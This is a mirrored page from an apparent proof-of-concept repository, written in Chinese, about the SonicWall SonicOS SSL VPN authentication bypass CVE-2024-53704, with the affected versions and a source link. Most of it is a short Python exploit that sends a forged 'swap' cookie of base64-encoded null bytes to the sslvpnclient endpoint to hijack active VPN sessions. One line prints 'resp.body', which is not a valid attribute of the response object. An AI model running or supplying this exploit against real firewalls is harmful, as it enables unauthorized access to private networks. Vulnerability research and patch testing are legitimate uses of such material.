admin/POC

mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00

eeeeeeeeee-code 06c8413e64 first commit

2025-03-04 23:12:57 +08:00

744 B

Raw Blame History

SonicOS-SSLVPN身份验证绕过漏洞(CVE-2024-53704)

SonicWall防火墙的身份验证旁路，允许远程攻击者劫持Active SSL SSL VPN会话并获得未经授权的网络访问，Sononicos版本7.1.x（7.1.1-7058及以上），7.1.2-7019和8.0.0-8035受到影响。

poc

import base64, requests, urllib3, warnings
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)
resp = requests.get(
    "https://192.168.50.189:4433/cgi-bin/sslvpnclient?launchplatform=",
    cookies={"swap": base64.b64encode(b"\x00" * 32).decode()},
    verify=False
)
print(resp.headers)
print(resp.body)

漏洞来源

https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking